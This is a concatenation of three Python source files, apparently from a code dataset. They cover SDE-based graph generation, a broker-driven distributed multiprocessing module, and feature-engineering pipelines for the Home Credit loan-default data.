import graphkke.generate_graphs.graph_generation as graph_generation
import graphkke.generate_graphs.generate_SDE as generate_SDE
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', type=str,
default='/home/katerynam/work/data/artificial/test/')
parser.add_argument('--n_graphs', type=int,
default=500)
parser.add_argument('--n_nodes', type=int,
default=300)
parser.add_argument('--radius', type=float,
default=0.6)
parser.add_argument('--n_wells', type=int,
default=3)
parser.add_argument('--out_state', type=int,
default=0.1)
parser.add_argument('--if_plot', type=bool,
default=True)
parser.add_argument('--seed', type=int,
default=7)
args = parser.parse_args()
def randb(n, b):
return b[0] + (b[1] - b[0]) * scipy.rand(1, n)
def rand(n, bounds, boxes):
d = boxes.size
x = np.zeros([d, n])
for i in range(d):
x[i, :] = randb(n, bounds[i, :])
return x
if __name__ == '__main__':
lm = generate_SDE.LemonSlice2D([0.9, 0.9], args.n_graphs, 2, args.n_wells)
x = rand(1, np.asarray([[-0.5, 0.5], [-0.5, 0.5]]), np.asarray([10, 10]))
sde_traj = np.asarray(lm.sim_determ_system(x[:, 0]))
k_means = KMeans(n_clusters=args.n_wells).fit(sde_traj)
graph_states = k_means.labels_
# sde_traj = np.load(args.input_dir + 'traj.npy')
# graph_states = np.load(args.input_dir + 'graph_states.npy')
plt.scatter(sde_traj[:, 0], sde_traj[:, 1], c=graph_states)
plt.show()
sim_graph = graph_generation.LemonGraph(args.radius, args.n_graphs, args.n_nodes,
graph_states)
graphs, images, node_points = sim_graph.create_adj_matrix(sde_traj, args.out_state, args.if_plot)
for i, image in enumerate(images):
imageio.imwrite(args.input_dir + f'/traj_{i}.png', image)
imageio.mimsave(args.input_dir + '/anim.gif', images, fps=2)
np.save(os.path.join(args.input_dir + 'traj.npy'), sde_traj)
np.save(os.path.join(args.input_dir + 'graphs.npy'), graphs)
np.save(os.path.join(args.input_dir + 'graph_states.npy'), graph_states)
np.save(os.path.join(args.input_dir + 'node_points.npy'), node_points)
| 2.34375 | 2 |
MultiPManager/distProc.py | sebastiantrianac/SoftTLON | 0 | 33412 | <reponame>sebastiantrianac/SoftTLON
#!/usr/bin/env python
# coding=utf-8
#
# A module for create a multi-agent system over Ad-hoc networks
# Copyright (C) 2017-2018
# <NAME> <<EMAIL>>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
__author__ = "<NAME>"
__copyright__ = "Copyright 2015, TLON group"
__license__ = "LGPL"
__version__ = "1.2"
__email__ = "<EMAIL>"
__status__ = "Development"
import multiprocessing
from multiprocessing.managers import SyncManager
import sys
import stomp
import dill as pickle
import time
import MultiPManager.managerImp as managerImp
import MultiPManager.brokermq as brokermq
import MultiPManager.multiProc as multiProc
import socket
if sys.version_info[0]<3:
import Queue
else:
import queue
IP = '10.203.177.194'
MANAGER_PORTNUM = 9999
BROKER_PORTNUM = 61613
AUTHKEY = ''
global numresults
numresults=0
tlon_resources = {}
def updateResourceOnSuscribers(resource, conn):
msg = pickle.dumps(resource,0)
conn.send(destination='/topic/TLONResources', body=msg)
def updateOrderOnSuscribers(name, ip, portnum, authkey,conn):
tmp = {"resourceName": name, "ip": ip, "portnum": portnum, "authkey": authkey}
msg = pickle.dumps(tmp,0)
conn.send(destination='/topic/TLONOrders', body=msg)
def tlon_sharedJobs(f, set, chunkSize):
manager = managerImp.make_server_manager(MANAGER_PORTNUM, AUTHKEY)
shared_job_q = manager.get_job_q()
shared_result_q = manager.get_result_q()
for i in range(0, len(set), chunkSize):
print('Putting chunk {}:{} in queue'.format(i, i + chunkSize))
shared_job_q.put(set[i:i + chunkSize])
return manager, shared_job_q, shared_result_q
def tlon_parallelize(ipbroker, f, set):
try:
resultdict = {}
N = 102
chunkSize = 10
conn = brokermq.BrokerConnect(ipbroker, BROKER_PORTNUM)
updateResourceOnSuscribers(f, conn)
manager, shared_job_q, shared_result_q = tlon_sharedJobs(f, set, chunkSize)
time.sleep(2)
hostname = socket.gethostname()
ipsocket = socket.gethostbyname(hostname)
updateOrderOnSuscribers(f.__name__, ipsocket, MANAGER_PORTNUM, AUTHKEY, conn)
global numresults
numresults = 0
#if 1:
# multiProc.tlon_multiprocessing(shared_job_q, shared_result_q, f)
while numresults < len(set):
outdict = shared_result_q.get()
#resultdict.update(outdict)
numresults += len(outdict)
#updateResourceOnSuscribers(f, conn)
#for num, result in outdict.iteritems():
#print("{}({}) = {}".format(f.__name__, num, result))
print ('End of Task')
except IOError as e:
print ("I/O error({0}): {1}".format(e.errno, e.strerror))
except ValueError:
print ("Could not convert data to an integer.")
finally:
time.sleep(2)
manager.shutdown()
def runclient(ipbroker, threads):
# Setting number of threads that are going to attend the request of processing of the network
multiProc.setThreads(threads)
# Connecting to TLONResource Topic to receive shared resources
connResources = brokermq.BrokerConnect(ipbroker, BROKER_PORTNUM)
connResources.set_listener('ResourceTopic', brokermq.__resourceTopicListener__())
connResources.subscribe(destination='/topic/TLONResources', id=1, ack='auto')
# Connecting to TLONOrders Topic to start executed OoW
connOrders = brokermq.BrokerConnect(ipbroker, BROKER_PORTNUM)
connOrders.set_listener('OrdersTopic', brokermq.__ordersTopicListener__())
connOrders.subscribe(destination='/topic/TLONOrders', id=2, ack='auto')
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'producer':
tlon_parallelize()
else:
runclient('192.168.0.8', 2)
| 1.835938 | 2 |
Gather_Data.py | batumoglu/Home_Credit | 1 | 33540 | <filename>Gather_Data.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 28 19:51:12 2018
@author: ozkan
"""
import pandas as pd
import numpy as np
#from sklearn.preprocessing import MinMaxScaler, LabelEncoder
from scipy import stats
import gc
import GatherTables
def one_hot_encoder(df):
original_columns = list(df.columns)
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
df = pd.get_dummies(df, columns= categorical_columns, dummy_na= True)
new_columns = [c for c in df.columns if c not in original_columns]
return df, new_columns
def checkTrainTestConsistency(train, test):
return (train,test)
def AllData_v2(reduce_mem=True):
app_data, len_train = GatherTables.getAppData()
app_data = GatherTables.generateAppFeatures(app_data)
merged_df = GatherTables.handlePrev(app_data)
merged_df = GatherTables.handleCreditCard(merged_df)
merged_df = GatherTables.handleBuro(merged_df)
merged_df = GatherTables.handleBuroBalance(merged_df)
merged_df = GatherTables.handlePosCash(merged_df)
merged_df = GatherTables.handleInstallments(merged_df)
categorical_feats = [f for f in merged_df.columns if merged_df[f].dtype == 'object']
for f_ in categorical_feats:
merged_df[f_], indexer = pd.factorize(merged_df[f_])
merged_df.drop('SK_ID_CURR', axis=1, inplace=True)
data = merged_df[:len_train]
test = merged_df[len_train:]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y)
def AllData_v3(reduce_mem=True):
app_data, len_train = GatherTables.getAppData()
app_data = GatherTables.generateAppFeatures(app_data)
merged_df = GatherTables.handlePrev_v2(app_data)
merged_df = GatherTables.handleCreditCard_v2(merged_df)
merged_df = GatherTables.handleBuro_v2(merged_df)
merged_df = GatherTables.handleBuroBalance_v2(merged_df)
merged_df = GatherTables.handlePosCash_v2(merged_df)
merged_df = GatherTables.handleInstallments_v2(merged_df)
categorical_feats = [f for f in merged_df.columns if merged_df[f].dtype == 'object']
for f_ in categorical_feats:
merged_df[f_], indexer = pd.factorize(merged_df[f_])
merged_df.drop('SK_ID_CURR', axis=1, inplace=True)
data = merged_df[:len_train]
test = merged_df[len_train:]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y)
def AllData_v4(reduce_mem=True):
app_data, len_train = GatherTables.getAppData()
app_data = GatherTables.generateAppFeatures_v4(app_data)
merged_df = GatherTables.handlePrev_v4(app_data)
merged_df = GatherTables.handleCreditCard_v4(merged_df)
merged_df = GatherTables.handleBuro_v4(merged_df)
merged_df = GatherTables.handleBuroBalance_v2(merged_df)
merged_df = GatherTables.handlePosCash_v2(merged_df)
merged_df = GatherTables.handleInstallments_v2(merged_df)
merged_df,cat_cols = one_hot_encoder(merged_df)
merged_df.drop('SK_ID_CURR', axis=1, inplace=True)
data = merged_df[:len_train]
test = merged_df[len_train:]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y)
def ApplicationBuroBalance(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
buro = pd.read_csv('../input/bureau.csv')
buro_balance = pd.read_csv('../input/bureau_balance.csv')
# Handle Buro Balance
buro_balance.loc[buro_balance['STATUS']=='C', 'STATUS'] = '0'
buro_balance.loc[buro_balance['STATUS']=='X', 'STATUS'] = '0'
buro_balance['STATUS'] = buro_balance['STATUS'].astype('int64')
buro_balance_group = buro_balance.groupby('SK_ID_BUREAU').agg({'STATUS':['max','mean'], 'MONTHS_BALANCE':'max'})
buro_balance_group.columns = [' '.join(col).strip() for col in buro_balance_group.columns.values]
idx = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].transform(max) == buro_balance['MONTHS_BALANCE']
Buro_Balance_Last = buro_balance[idx][['SK_ID_BUREAU','STATUS']]
Buro_Balance_Last.rename(columns={'STATUS': 'Buro_Balance_Last_Value'}, inplace=True)
Buro_Balance_Last['Buro_Balance_Max'] = Buro_Balance_Last['SK_ID_BUREAU'].map(buro_balance_group['STATUS max'])
Buro_Balance_Last['Buro_Balance_Mean'] = Buro_Balance_Last['SK_ID_BUREAU'].map(buro_balance_group['STATUS mean'])
Buro_Balance_Last['Buro_Balance_Last_Month'] = Buro_Balance_Last['SK_ID_BUREAU'].map(buro_balance_group['MONTHS_BALANCE max'])
# Handle Buro Data
def nonUnique(x):
return x.nunique()
def modeValue(x):
return stats.mode(x)[0][0]
def totalBadCredit(x):
badCredit = 0
for value in x:
if(value==2 or value==3):
badCredit+=1
return badCredit
def creditOverdue(x):
overdue=0
for value in x:
if(value>0):
overdue+=1
return overdue
categorical_feats = [f for f in buro.columns if buro[f].dtype == 'object']
for f_ in categorical_feats:
buro[f_], indexer = pd.factorize(buro[f_])
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
# Aggregate Values on All Credits
buro_group = buro.groupby('SK_ID_CURR').agg({'SK_ID_BUREAU':'count',
'AMT_CREDIT_SUM':'sum',
'AMT_CREDIT_SUM_DEBT':'sum',
'CREDIT_CURRENCY': [nonUnique, modeValue],
'CREDIT_TYPE': [nonUnique, modeValue],
'CNT_CREDIT_PROLONG': 'sum',
'CREDIT_ACTIVE': totalBadCredit,
'CREDIT_DAY_OVERDUE': creditOverdue
})
buro_group.columns = [' '.join(col).strip() for col in buro_group.columns.values]
# Aggregate Values on Active Credits
buro_active = buro.loc[buro['CREDIT_ACTIVE']==1]
buro_group_active = buro_active.groupby('SK_ID_CURR').agg({'AMT_CREDIT_SUM': ['sum', 'count'],
'AMT_CREDIT_SUM_DEBT': 'sum',
'AMT_CREDIT_SUM_LIMIT': 'sum'
})
buro_group_active.columns = [' '.join(col).strip() for col in buro_group_active.columns.values]
# Getting last credit for each user
idx = buro.groupby('SK_ID_CURR')['SK_ID_BUREAU'].transform(max) == buro['SK_ID_BUREAU']
Buro_Last = buro[idx][['SK_ID_CURR','CREDIT_TYPE','DAYS_CREDIT_UPDATE','DAYS_CREDIT',
'DAYS_CREDIT_ENDDATE','DAYS_ENDDATE_FACT', 'SK_ID_BUREAU']]
Buro_Last['Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group['SK_ID_BUREAU count'])
Buro_Last['Total_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM sum'])
Buro_Last['Total_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['NumberOfCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY nonUnique'])
Buro_Last['MostCommonCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY modeValue'])
Buro_Last['NumberOfCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE nonUnique'])
Buro_Last['MostCommonCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE modeValue'])
Buro_Last['NumberOfCreditProlong'] = Buro_Last['SK_ID_CURR'].map(buro_group['CNT_CREDIT_PROLONG sum'])
Buro_Last['NumberOfBadCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_ACTIVE totalBadCredit'])
Buro_Last['NumberOfDelayedCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_DAY_OVERDUE creditOverdue'])
Buro_Last['Active_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM sum'])
Buro_Last['Active_Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM count'])
Buro_Last['Active_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['Active_Credit_Card_Limit'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_LIMIT sum'])
Buro_Last['BalanceOnCreditBuro'] = Buro_Last['Active_Debt_Amount'] / Buro_Last['Active_Credit_Amount']
# Merge buro with Buro Balance
buro_merged = pd.merge(buro, Buro_Balance_Last, how='left', on='SK_ID_BUREAU')
buro_merged = buro_merged[['SK_ID_CURR','SK_ID_BUREAU','Buro_Balance_Last_Value','Buro_Balance_Max',
'Buro_Balance_Mean','Buro_Balance_Last_Month']]
buro_merged_group = buro_merged.groupby('SK_ID_CURR').agg(np.mean)
buro_merged_group.reset_index(inplace=True)
buro_merged_group.drop('SK_ID_BUREAU', axis=1, inplace=True)
# Add Tables to main Data
data = data.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=buro_merged_group.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=buro_merged_group.reset_index(), how='left', on='SK_ID_CURR')
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def ApplicationBuro(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
buro = pd.read_csv('../input/bureau.csv')
def nonUnique(x):
return x.nunique()
def modeValue(x):
return stats.mode(x)[0][0]
def totalBadCredit(x):
badCredit = 0
for value in x:
if(value==2 or value==3):
badCredit+=1
return badCredit
def creditOverdue(x):
overdue=0
for value in x:
if(value>0):
overdue+=1
return overdue
categorical_feats = [f for f in buro.columns if buro[f].dtype == 'object']
for f_ in categorical_feats:
buro[f_], indexer = pd.factorize(buro[f_])
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
# Aggregate Values on All Credits
buro_group = buro.groupby('SK_ID_CURR').agg({'SK_ID_BUREAU':'count',
'AMT_CREDIT_SUM':'sum',
'AMT_CREDIT_SUM_DEBT':'sum',
'CREDIT_CURRENCY': [nonUnique, modeValue],
'CREDIT_TYPE': [nonUnique, modeValue],
'CNT_CREDIT_PROLONG': 'sum',
'CREDIT_ACTIVE': totalBadCredit,
'CREDIT_DAY_OVERDUE': creditOverdue
})
buro_group.columns = [' '.join(col).strip() for col in buro_group.columns.values]
# Aggregate Values on Active Credits
buro_active = buro.loc[buro['CREDIT_ACTIVE']==1]
buro_group_active = buro_active.groupby('SK_ID_CURR').agg({'AMT_CREDIT_SUM': ['sum', 'count'],
'AMT_CREDIT_SUM_DEBT': 'sum',
'AMT_CREDIT_SUM_LIMIT': 'sum'
})
buro_group_active.columns = [' '.join(col).strip() for col in buro_group_active.columns.values]
# Getting last credit for each user
idx = buro.groupby('SK_ID_CURR')['SK_ID_BUREAU'].transform(max) == buro['SK_ID_BUREAU']
Buro_Last = buro[idx][['SK_ID_CURR','CREDIT_TYPE','DAYS_CREDIT_UPDATE','DAYS_CREDIT',
'DAYS_CREDIT_ENDDATE','DAYS_ENDDATE_FACT']]
Buro_Last['Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group['SK_ID_BUREAU count'])
Buro_Last['Total_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM sum'])
Buro_Last['Total_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['NumberOfCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY nonUnique'])
Buro_Last['MostCommonCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY modeValue'])
Buro_Last['NumberOfCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE nonUnique'])
Buro_Last['MostCommonCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE modeValue'])
Buro_Last['NumberOfCreditProlong'] = Buro_Last['SK_ID_CURR'].map(buro_group['CNT_CREDIT_PROLONG sum'])
Buro_Last['NumberOfBadCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_ACTIVE totalBadCredit'])
Buro_Last['NumberOfDelayedCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_DAY_OVERDUE creditOverdue'])
Buro_Last['Active_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM sum'])
Buro_Last['Active_Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM count'])
Buro_Last['Active_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['Active_Credit_Card_Limit'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_LIMIT sum'])
Buro_Last['BalanceOnCreditBuro'] = Buro_Last['Active_Debt_Amount'] / Buro_Last['Active_Credit_Amount']
data = data.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def ApplicationOnly(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def ApplicationBuroAndPrev(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
prev = pd.read_csv('../input/previous_application.csv')
buro = pd.read_csv('../input/bureau.csv')
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
prev_cat_features = [f_ for f_ in prev.columns if prev[f_].dtype == 'object']
for f_ in prev_cat_features:
prev = pd.concat([prev, pd.get_dummies(prev[f_], prefix=f_)], axis=1)
cnt_prev = prev[['SK_ID_CURR', 'SK_ID_PREV']].groupby('SK_ID_CURR').count()
prev['SK_ID_PREV'] = prev['SK_ID_CURR'].map(cnt_prev['SK_ID_PREV'])
avg_prev = prev.groupby('SK_ID_CURR').mean()
avg_prev.columns = ['prev_app_' + f_ for f_ in avg_prev.columns]
buro_cat_features = [f_ for f_ in buro.columns if buro[f_].dtype == 'object']
for f_ in buro_cat_features:
buro = pd.concat([buro, pd.get_dummies(buro[f_], prefix=f_)], axis=1)
avg_buro = buro.groupby('SK_ID_CURR').mean()
avg_buro['buro_count'] = buro[['SK_ID_BUREAU','SK_ID_CURR']].groupby('SK_ID_CURR').count()['SK_ID_BUREAU']
avg_buro.columns = ['bureau_' + f_ for f_ in avg_buro.columns]
data = data.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def AllData(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
prev = pd.read_csv('../input/previous_application.csv')
buro = pd.read_csv('../input/bureau.csv')
buro_balance = pd.read_csv('../input/bureau_balance.csv')
credit_card = pd.read_csv('../input/credit_card_balance.csv')
POS_CASH = pd.read_csv('../input/POS_CASH_balance.csv')
payments = pd.read_csv('../input/installments_payments.csv')
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
y = data['TARGET']
del data['TARGET']
#Pre-processing buro_balance
print('Pre-processing buro_balance...')
buro_grouped_size = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].size()
buro_grouped_max = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].max()
buro_grouped_min = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].min()
buro_counts = buro_balance.groupby('SK_ID_BUREAU')['STATUS'].value_counts(normalize = False)
buro_counts_unstacked = buro_counts.unstack('STATUS')
buro_counts_unstacked.columns = ['STATUS_0', 'STATUS_1','STATUS_2','STATUS_3','STATUS_4','STATUS_5','STATUS_C','STATUS_X',]
buro_counts_unstacked['MONTHS_COUNT'] = buro_grouped_size
buro_counts_unstacked['MONTHS_MIN'] = buro_grouped_min
buro_counts_unstacked['MONTHS_MAX'] = buro_grouped_max
buro = buro.join(buro_counts_unstacked, how='left', on='SK_ID_BUREAU')
#Pre-processing previous_application
print('Pre-processing previous_application...')
#One-hot encoding of categorical features in previous application data set
prev_cat_features = [pcol for pcol in prev.columns if prev[pcol].dtype == 'object']
prev = pd.get_dummies(prev, columns=prev_cat_features)
avg_prev = prev.groupby('SK_ID_CURR').mean()
cnt_prev = prev[['SK_ID_CURR', 'SK_ID_PREV']].groupby('SK_ID_CURR').count()
avg_prev['nb_app'] = cnt_prev['SK_ID_PREV']
del avg_prev['SK_ID_PREV']
#Pre-processing buro
print('Pre-processing buro...')
#One-hot encoding of categorical features in buro data set
buro_cat_features = [bcol for bcol in buro.columns if buro[bcol].dtype == 'object']
buro = pd.get_dummies(buro, columns=buro_cat_features)
avg_buro = buro.groupby('SK_ID_CURR').mean()
avg_buro['buro_count'] = buro[['SK_ID_BUREAU', 'SK_ID_CURR']].groupby('SK_ID_CURR').count()['SK_ID_BUREAU']
del avg_buro['SK_ID_BUREAU']
#Pre-processing POS_CASH
print('Pre-processing POS_CASH...')
le = LabelEncoder()
POS_CASH['NAME_CONTRACT_STATUS'] = le.fit_transform(POS_CASH['NAME_CONTRACT_STATUS'].astype(str))
nunique_status = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()
nunique_status2 = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()
POS_CASH['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']
POS_CASH['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']
POS_CASH.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)
#Pre-processing credit_card
print('Pre-processing credit_card...')
credit_card['NAME_CONTRACT_STATUS'] = le.fit_transform(credit_card['NAME_CONTRACT_STATUS'].astype(str))
nunique_status = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()
nunique_status2 = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()
credit_card['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']
credit_card['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']
credit_card.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)
#Pre-processing payments
print('Pre-processing payments...')
avg_payments = payments.groupby('SK_ID_CURR').mean()
avg_payments2 = payments.groupby('SK_ID_CURR').max()
avg_payments3 = payments.groupby('SK_ID_CURR').min()
del avg_payments['SK_ID_PREV']
#Join data bases
print('Joining databases...')
data = data.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def reduce_mem_usage(df):
start_mem = df.memory_usage().sum() / 1024**2
print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))
for col in df.columns:
col_type = df[col].dtype
if col_type != object:
c_min = df[col].min()
c_max = df[col].max()
if str(col_type)[:3] == 'int':
if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
else:
if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:
df[col] = df[col].astype(np.float16)
elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:
df[col] = df[col].astype(np.float32)
else:
df[col] = df[col].astype(np.float64)
else:
df[col] = df[col].astype('category')
end_mem = df.memory_usage().sum() / 1024**2
print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))
print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))
return df
def AllData_v5(reduce_mem=True):
df = GatherTables.application_train_test()
with GatherTables.timer("Process bureau and bureau_balance"):
bureau = GatherTables.bureau_and_balance()
print("Bureau df shape:", bureau.shape)
df = df.join(bureau, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del bureau
gc.collect()
with GatherTables.timer("Process previous_applications"):
prev = GatherTables.previous_applications()
print("Previous applications df shape:", prev.shape)
df = df.join(prev, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del prev
gc.collect()
with GatherTables.timer("Process POS-CASH balance"):
pos = GatherTables.pos_cash()
print("Pos-cash balance df shape:", pos.shape)
df = df.join(pos, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del pos
gc.collect()
with GatherTables.timer("Process installments payments"):
ins = GatherTables.installments_payments()
print("Installments payments df shape:", ins.shape)
df = df.join(ins, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del ins
gc.collect()
with GatherTables.timer("Process credit card balance"):
cc = GatherTables.credit_card_balance()
print("Credit card balance df shape:", cc.shape)
df = df.join(cc, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del cc
gc.collect()
df, new_columns = one_hot_encoder(df)
df.drop('SK_ID_CURR', axis=1, inplace=True)
data = df[df['TARGET'].notnull()]
test = df[df['TARGET'].isnull()]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y) | 1.882813 | 2 |
